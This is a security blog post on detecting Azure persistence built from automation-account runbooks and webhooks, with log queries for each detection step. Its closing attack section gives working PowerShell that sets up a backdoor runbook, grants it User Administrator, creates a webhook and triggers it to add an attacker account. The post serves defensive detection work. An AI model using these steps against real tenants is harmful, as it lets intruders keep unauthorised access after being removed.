How to Detect Malicious Azure Persistence Through Automation Account Abuse

There are many ways an attacker can maintain persistence and create ‘backdoors’ in Azure that allow re-entry into the environment. Persistence matters to an attacker because, even after the victim organisation discovers and removes the compromised accounts, the attacker still needs a way to regain access to the environment. 

Installing a webhook to interact with malicious runbooks created through automation accounts is one way an attacker can regain access to a tenant after their compromised account access has been revoked. I was inspired to write this blog post about how to detect this technique when I came across an excellent post written by Karl Fosaaen detailing how an attacker can abuse automation accounts to maintain persistence. I have broken this blog post into two sections covering the detection methodology and the attack flow. For a more detailed attack flow, I urge you to read Karl's blog, as I took what he detailed in his post and recreated his attack to work out the detection methods. 

In short, once an attacker is kicked out of a tenant, they can trigger their runbook to run, granting them access back into the tenant. This doesn't have to be via the creation of a new user account as depicted in the clip below; it can be any other action, e.g. remote execution of commands on VMs or the addition of a key/certificate to service principals. 


If you're interested in detecting other Azure persistence / backdoor methods, I've previously covered three of those techniques in other blog posts listed below: 

If you’re curious about attacks on Azure Active Directory (AAD) or M365, you can check out my attack matrix here. 


High-Level Overview of the Attack 
Automation accounts in Azure are a service that allows tasks to be automated through “runbooks” (similar to a job or scheduled task), which are essentially PowerShell scripts you can import and run. Several organisations I have come across have automated PowerShell scripts running within their on-premises environment to perform various tasks; automation accounts and runbooks apply that same concept to the Azure environment. As such, abusing automation accounts and runbooks is in a similar vein to the popular attack of installing malicious services or scheduled tasks. 

Once an attacker has sufficient privileges within an environment, they will look to establish persistence to maintain a foothold. The attacker can use an existing automation account or create a malicious automation account to register a runbook that runs PowerShell scripts to conduct malicious activities such as (but not limited to):
  • Creation of a new user account to allow the attacker back into the network (the scenario we will be using as per Karl’s blog) 
  • Execution of malicious scripts on VMs
  • Adding certificates / keys to the automation account for single-factor access into AAD
  • Whatever else the attacker wants to run in PowerShell based on the privileges granted to the automation account 
If the victim severs the attacker's access to the tenant by revoking all compromised user credentials, the attacker can call a webhook to trigger their malicious runbook to run the malicious script again, leading to re-entry into the environment. 


Detection Methodology
To detect the abuse of automation accounts and malicious runbooks, there are a few things to consider, as this attack can be leveraged by an attacker in many ways depending on their objectives:
  • Abuse of an existing automation account, e.g. assigning further privileges or permissions
  • Creation of a new automation account for malicious purposes
  • Editing an existing runbook to insert malicious commands
  • Creation of a new runbook that has malicious commands
  • Detection of actions / commands issued within these runbooks (this can vary depending on what the threat actor is aiming to achieve)
As such, I’ve broken down the detection into a few areas to review:
  1. Review webhook creations for signs of potentially malicious webhooks a threat actor can interact with
  2. Review webhook requests for malicious requests 
  3. Review all automation account creations for signs of malicious activity
  4. Review and assess permissions assigned to automation accounts
  5. Review all runbooks that are modified / created for signs of malicious activities 
  6. Review malicious logons and other details in audit logs that may show other suspicious activities 

The log sources that will help you in the identification of this include the Automation Account Activity Log, Subscription Activity Log, Resource Activity Log, Runbook Activity Log, Sign-in Logs, UAL and the Azure Active Directory Audit Logs. 

Step 1: Review webhook creations
If access via the compromised accounts has been severed by the target organisation, the attacker can call a webhook to interact with their malicious runbooks and regain access to the target environment. For this attack path to exist, the attacker needs to register a webhook that they can use to interact with their malicious runbook. Each runbook lists the webhooks that exist for it within the portal. These can be tracked in the activity log for the automation account and ALSO in the subscription activity logs.

Look for the following in the automation account and subscription activity logs: 
  • Operation name: Create or Update an Azure Automation webhook
  • Operation name: Generate a URI for an Azure Automation webhook

As you can see in the screenshot below, I have indeed created a malicious webhook that I named evilWebhook. A real attacker would of course not use such a giveaway name :)
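If you would rather hunt for these operations programmatically than click through the portal, a rough sketch using the Az PowerShell modules is below. Treat it as a starting point only: it keys off the webhook resource ID rather than the localised operation names above, and it assumes you have already run Connect-AzAccount against the right subscription.

# Hunting sketch (Az.Accounts / Az.Monitor). Property shapes can vary between
# Az.Monitor versions, so adjust the filter after inspecting a known event.
$start = (Get-Date).AddDays(-14)

Get-AzActivityLog -StartTime $start |
    Where-Object { $_.ResourceId -match 'Microsoft\.Automation/automationAccounts/.+/webhooks' } |
    Select-Object EventTimestamp, Caller, ResourceGroupName, ResourceId, OperationName |
    Sort-Object EventTimestamp -Descending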



Step 2: Review malicious webhook requests
No authentication is required for an attacker / user to call or interact with a webhook. As such, organisations should take care not to “publicise” their webhooks, as the URL allows direct interaction with the runbook it's attached to. Webhook calls can be seen within the runbook input logs; as you can see here, a request was made to this webhook to create a malicious user called “inverseEvil” with the password “Password123”. I leveraged this runbook published by Karl.
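Because the webhook URI itself cannot be recovered after creation, one practical review step is simply to inventory which webhooks exist on each runbook and when they were last invoked. A minimal sketch with the Az.Automation module is below; the resource group and automation account names are placeholders for your own environment.

# Webhook inventory sketch (Az.Automation, after Connect-AzAccount).
Get-AzAutomationWebhook -ResourceGroupName 'MyResourceGroup' `
                        -AutomationAccountName 'MyAutomationAccount' |
    Select-Object Name, RunbookName, IsEnabled, CreationTime, LastInvokedTime, ExpiryTime |
    Sort-Object LastInvokedTime -Descending

A webhook with a recent LastInvokedTime attached to a runbook nobody recognises is a good candidate for pulling the runbook input logs.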



Step 3: Review all automation account creations for signs of malicious activity
Please note that an attacker can use an existing automation account to conduct these actions, or they can create their own malicious one. Creations of automation accounts are logged in the Azure Active Directory Audit Logs as pictured in the highlighted line below. I would hunt for the following:
  • Category: ApplicationManagement
  • Activity: Add service principal
  • Initiated by: Managed Service Identity 

Further details relating to this creation can be seen here, where you can also grep through the “ManagedIdentityResourceId” property for “automationAccounts”. 
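If you prefer to pull the AAD audit logs with the Microsoft Graph PowerShell SDK rather than the portal, something like the sketch below can surface these events. The check on the initiator display name mirrors what the portal shows and is an assumption, so validate it against a known-good event in your own tenant first.

# Sketch using the Microsoft Graph PowerShell SDK (Microsoft.Graph.Reports).
Connect-MgGraph -Scopes 'AuditLog.Read.All','Directory.Read.All'

Get-MgAuditLogDirectoryAudit -Filter "activityDisplayName eq 'Add service principal'" -All |
    Where-Object { $_.InitiatedBy.App.DisplayName -eq 'Managed Service Identity' } |
    Select-Object ActivityDateTime, ActivityDisplayName,
                  @{ Name = 'Target'; Expression = { $_.TargetResources[0].DisplayName } }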


Step 4: Review and assess permissions assigned to automation accounts
In order for the runbook to perform the tasks the attacker wants, e.g. creating a new user account the attacker can leverage, adding a key/certificate to an existing service principal, or executing commands on virtual machines, the attacker needs to ensure the automation account running the runbook has sufficient permissions. The attacker can leverage an existing automation account that already has these permissions, or assign them to the automation account they have created or are maliciously using. The logic here is to constantly monitor role assignments and modifications for potentially sensitive roles being added or assigned to service principals / user accounts. For this example, I followed Karl's blog and used the runbook to create a new user account that the attacker can then use to log into the tenant. Activities pertaining to role assignments can be tracked by reviewing the Azure Active Directory Audit Logs for the following (a query sketch follows the list below):

  • Category: RoleManagement
  • Activity: Add member to role
  • Property Role.DisplayName for sensitive roles, e.g. User Administrator, Cloud Administrator, Virtual Machine Contributor, Global Administrator, etc.
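A rough Graph SDK sketch for this hunt is below. The list of “sensitive” roles is just the examples from above, so extend it to whatever you treat as sensitive in your tenant, and note that the modified-property parsing is based on how AAD audit entries are typically structured and may need tweaking.

# Role assignment hunting sketch (Microsoft.Graph.Reports, after
# Connect-MgGraph -Scopes 'AuditLog.Read.All','Directory.Read.All').
$sensitiveRoles = @('User Administrator', 'Global Administrator') -join '|'

Get-MgAuditLogDirectoryAudit -Filter "activityDisplayName eq 'Add member to role'" -All |
    Where-Object {
        $_.TargetResources.ModifiedProperties |
            Where-Object { $_.DisplayName -eq 'Role.DisplayName' -and $_.NewValue -match $sensitiveRoles }
    } |
    Select-Object ActivityDateTime,
                  @{ Name = 'Assignee'; Expression = { $_.TargetResources[0].DisplayName } }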


Step 5: Review all runbooks that are modified / created for signs of malicious activities 
In order for this attack flow to work, a malicious runbook needs to be uploaded or an existing runbook needs to be modified to run malicious PowerShell. This can be tracked in many log sources; this step by far generates events almost everywhere. It can be seen in the Subscription Activity Logs, Resource Activity Logs, Runbook Activity Logs and the Automation Account Activity Logs. For the sake of example, I am showing the following from the runbook activity logs. Look for the following operations throughout these log sources:
  • Operation: Create or Update an Azure Automation Runbook
  • Operation: Publish an Azure automation runbook draft
  • Operation: Write an Azure Automation runbook draft
  • Filter: Runbook name (look for a runbook name outside the norm).
Typically, Azure runbooks follow the naming convention of AzureAutomation<Something>. I would use this opportunity to hunt for runbooks or names that break convention, or build a baseline of “known good” runbooks and hunt for malicious additions. Also note that existing legitimate runbooks may be edited to have additional PowerShell appended to the bottom, which is why runbook names alone are not a fail-safe detection mechanism. 
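The same activity-log hunting approach from Step 1 works here too; a rough sketch keying off runbook resource IDs is below, again assuming a prior Connect-AzAccount.

# Runbook write / publish hunting sketch (Az.Monitor).
$start = (Get-Date).AddDays(-14)

Get-AzActivityLog -StartTime $start |
    Where-Object { $_.ResourceId -match 'Microsoft\.Automation/automationAccounts/.+/runbooks' } |
    Select-Object EventTimestamp, Caller, ResourceGroupName, ResourceId, OperationName |
    Sort-Object EventTimestamp -Descending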



The full list of runbooks can be seen in the portal under Automation Accounts > [account] > Runbooks. 
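To build the “known good” baseline mentioned above, you can enumerate every runbook and export the published content somewhere you can diff against later. A minimal sketch with Az.Automation is below; the resource group, account name and output folder are placeholders.

# Baseline sketch: list runbooks and export their published content for diffing.
$rg      = 'MyResourceGroup'
$account = 'MyAutomationAccount'
$outDir  = 'C:\RunbookBaseline'
New-Item -ItemType Directory -Path $outDir -Force | Out-Null

$runbooks = Get-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $account
$runbooks | Select-Object Name, RunbookType, State, CreationTime, LastModifiedTime |
    Sort-Object LastModifiedTime -Descending

# Export published runbooks only; draft-only runbooks will need -Slot 'Draft'.
$runbooks | ForEach-Object {
    Export-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $account `
        -Name $_.Name -Slot 'Published' -OutputFolder $outDir -Force
}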


Step 6: Review malicious logons and other details in audit logs that may show other suspicious activities 

I left this one until last because this final detection depends on what the runbook does. In the case of this runbook, as per Karl's blog, a new user is created to allow the attacker access back into the environment. This is relatively easy to hunt for, as it is logged in the Azure Active Directory Audit Logs as a new user creation made by an automation account (a query sketch follows the list below):

  • Activity: Add user
  • Initiated by: Managed Service Identity
  • Activity Type: Add Service Principal
  • User Agent: Swagger-Codegen*
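A query sketch for this hunt with the Graph SDK is below; as before, the initiator display name check reflects what the portal shows and should be validated against a real event in your tenant.

# New-user-by-automation-account hunting sketch (Microsoft.Graph.Reports, after
# Connect-MgGraph -Scopes 'AuditLog.Read.All','Directory.Read.All').
Get-MgAuditLogDirectoryAudit -Filter "activityDisplayName eq 'Add user'" -All |
    Where-Object { $_.InitiatedBy.App.DisplayName -eq 'Managed Service Identity' } |
    Select-Object ActivityDateTime,
                  @{ Name = 'NewUser'; Expression = { $_.TargetResources[0].UserPrincipalName } }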



The malicious logon activity can be seen in the following location in the Azure Sign-in Logs, and also in the Unified Audit Log :)
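If you want to pull the same logons out of the UAL rather than the portal, a minimal Exchange Online PowerShell sketch is below. The UPN is a placeholder for whichever suspect account you identified in the audit logs.

# UAL sign-in sketch (ExchangeOnlineManagement, after Connect-ExchangeOnline).
Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-7) -EndDate (Get-Date) `
    -Operations 'UserLoggedIn' `
    -UserIds 'inverseEvil@yourtenant.onmicrosoft.com' `
    -ResultSize 5000 |
    Select-Object CreationDate, UserIds, Operations, AuditData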


Attack Methodology
As mentioned previously, I followed the attack methodology detailed by Karl in his blog. For a more detailed account of the attack (I'm summarising some of the steps here), please refer to his post. For the sake of this blog post, I wanted to show the corresponding actions I ran so you can map them back to the detection methodology outlined above. 

Step 1: Creation of an Automation Account
The attacker needs to either leverage an EXISTING automation account or create a new one to conduct this activity. This can be done within the portal by accessing the “Automation Accounts” service. The automation account needs to be linked to an existing subscription and resource group.
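For reference, the equivalent of this portal step with the Az.Automation module would look roughly like the below; the names and region are placeholders.

# Create an automation account (Az.Automation, after Connect-AzAccount).
New-AzAutomationAccount -ResourceGroupName 'MyResourceGroup' `
                        -Name 'MyAutomationAccount' `
                        -Location 'australiaeast'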



Step 2: Import or modify existing runbook and publish the runbook
If the attacker created their own automation account, a runbook needs to be created to run whatever PowerShell commands the attacker wishes. If the attacker takes over an existing automation account with existing runbooks, those runbooks can be modified instead. In this instance, I imported a runbook made by Karl whose goal is to create a new user account for the attacker if the attacker's accounts have been discovered and removed by the target organisation. 


Once the runbook is imported or modified, the attacker will need to manually publish the runbook by going into the runbook and hitting “publish”. 
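Scripted, the import and publish steps look roughly like the below. The path is a placeholder for wherever you saved the runbook; the returned object is captured so the publish step can reference the runbook by name.

# Import a local PowerShell runbook and publish it (Az.Automation).
$runbook = Import-AzAutomationRunbook -ResourceGroupName 'MyResourceGroup' `
    -AutomationAccountName 'MyAutomationAccount' `
    -Path 'C:\tools\new-user-runbook.ps1' `
    -Type PowerShell

Publish-AzAutomationRunbook -ResourceGroupName 'MyResourceGroup' `
    -AutomationAccountName 'MyAutomationAccount' `
    -Name $runbook.Name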

Step 3: Assign the necessary roles to the automation account
For the sake of this exercise, as our goal is to allow the runbook to create a new account that the attacker can use to access the tenant if they are locked out, the “User Administrator” role needs to be assigned to the automation account. The roles you choose to assign will depend on what your runbook needs in order to complete whatever malicious operations you want it to perform. Role assignments can be managed in the Azure Active Directory Roles and Assignments section.
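I made this assignment through the portal, but for completeness, a rough equivalent with the Microsoft Graph PowerShell SDK is sketched below. The service principal object ID is a placeholder you would look up first, and the GUID is the well-known User Administrator role template ID (verify it against your tenant's role definitions before relying on it).

# Assign the User Administrator directory role to the automation account's
# service principal (Microsoft.Graph.Identity.Governance).
Connect-MgGraph -Scopes 'RoleManagement.ReadWrite.Directory'

New-MgRoleManagementDirectoryRoleAssignment `
    -PrincipalId '<automation-account-service-principal-object-id>' `
    -RoleDefinitionId 'fe930be7-5e62-47db-91af-98c3a49a38b1' `
    -DirectoryScopeId '/'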



Step 4: Create the webhook
If the attacker is locked out of all accounts and has no way to log back into the environment, the webhook is crucial: it lets the attacker interact with their runbook and, depending on what that runbook does, regain access to the environment. The webhook is created within the specific runbook it belongs to:


The webhook URL is only displayed on this page at creation time; there is no way to “see” the URL again afterwards, which is why it's important to take note of it when you create the webhook.
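Creating the webhook from PowerShell makes this point obvious: the URI only comes back in the object returned at creation time, so it has to be saved straight away. A sketch with Az.Automation (placeholder names again) is below.

# Create the webhook and save the one-time URI (Az.Automation).
$webhook = New-AzAutomationWebhook -ResourceGroupName 'MyResourceGroup' `
    -AutomationAccountName 'MyAutomationAccount' `
    -RunbookName 'new-user-runbook' `
    -Name 'evilWebhook' `
    -IsEnabled $true `
    -ExpiryTime (Get-Date).AddYears(1) `
    -Force

# WebhookURI is only populated here; it cannot be retrieved later.
$webhook.WebhookURI | Out-File 'C:\tools\webhook-uri.txt'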

Step 5: Complete the attack!
Once the target organisation detects you and revokes all your accounts, you can trigger the webhook and create a new account to access the tenant again. 
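Triggering the webhook is just an unauthenticated POST to the saved URI. The body below reuses the username / password from the detection example earlier; the exact parameter names the runbook expects are an assumption, so check the runbook's own parameters before using this.

# Trigger the runbook via its webhook (no authentication required).
$uri  = Get-Content 'C:\tools\webhook-uri.txt'
$body = @{ UserName = 'inverseEvil'; Password = 'Password123' } | ConvertTo-Json

Invoke-RestMethod -Method Post -Uri $uri -Body $body -ContentType 'application/json'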



References:
https://www.netspi.com/blog/technical/cloud-penetration-testing/maintaining-azure-persistence-via-automation-accounts/
https://docs.microsoft.com/en-us/azure/automation/automation-runbook-types
https://docs.microsoft.com/en-us/azure/automation/overview





